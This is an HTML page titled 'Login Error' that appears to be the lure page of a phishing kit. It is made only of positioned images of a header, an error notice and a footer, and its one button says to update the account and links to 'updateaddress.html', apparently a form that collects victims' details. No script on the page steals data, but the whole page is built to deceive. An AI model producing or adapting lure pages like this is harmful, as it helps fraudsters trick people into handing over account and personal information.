<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Login Error</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<link rel="shortcut icon"
              href="images/favicon.ico"/>
			  
			  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
div#container
{
	position:relative;
	width: 100%;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {text-align:center;margin:0}
</style>

</head>
<body bgColor="#F4F4F4">
<div id="container">
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1348px; height:74px; z-index:0"><img src="images/header.png" alt="" title="" border=0 width=1348 height=74></div>

<div id="image2" style="position:absolute; overflow:hidden; left:339px; top:102px; width:580px; height:571px; z-index:1"><img src="images/erorinfo.png" alt="" title="" border=0 width=580 height=571></div>

<div id="image3" style="position:absolute; overflow:hidden; left:1px; top:836px; width:1349px; height:82px; z-index:2"><a href="#"><img src="images/footerss.png" alt="" title="" border=0 width=1349 height=82></a></div>

<div id="image4" style="position:absolute; overflow:hidden; left:460px; top:559px; width:324px; height:48px; z-index:3"><a href="updateaddress.html"><img src="images/updateacc.png" alt="" title="" border=0 width=324 height=48></div>

</div>

</body>
</html>
